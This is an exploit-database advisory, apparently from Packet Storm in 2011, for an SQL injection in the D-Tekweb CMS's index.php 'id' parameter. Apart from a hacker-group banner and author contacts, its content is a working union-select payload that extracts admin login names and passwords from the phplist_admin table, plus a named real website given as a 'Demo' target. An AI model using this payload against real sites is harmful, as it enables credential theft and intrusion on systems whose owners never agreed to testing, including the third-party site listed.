D-Tekweb SQL Injection

2011-08-31T00:00:00
ID PACKETSTORM:104654
Type packetstorm
Reporter OuTLaWz
Modified 2011-08-31T00:00:00

Description

                                        
                                            `================================================  
D-Tekweb (index.php) SQL Injection Vulnerability  
================================================  
  
  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : Inj3ct0r.com 0  
1 [+] Support e-mail : submit[at]inj3ct0r.com 1  
0 0  
1 ########################################### 1  
0 I'm The_Exploited member from Inj3ct0r Team 1  
1 ########################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
[+] Discovered By: The_Exploited  
  
@Title: D-Tekweb (index.php) SQL Injection Vulnerability  
  
@Author: OuTLaWz aka The_Exploited aka l3d aka Spoof  
  
@Mail: spoof@live.it  
  
@Yahoo Messenger: user_31337@yahoo.com  
  
@Site: WwW.SecuritySpl0its.CoM  
  
@Path: http://www.mysite.com/index.php?act=news&id=[SQL]  
  
@SQL Injection: -null+union+all+select+null,concat(loginname,0x3a,password),null,null,null,null,null+from+phplist_admin  
  
@Demo: http://www.casarizzo.it/index.php?act=news&id=[SQL]  
  
@Platform: PHP  
  
@CMS Version: All  
  
@CMS Download: http://www.dtekweb.com/  
  
  
# 1337day.com [2010-07-14]  
`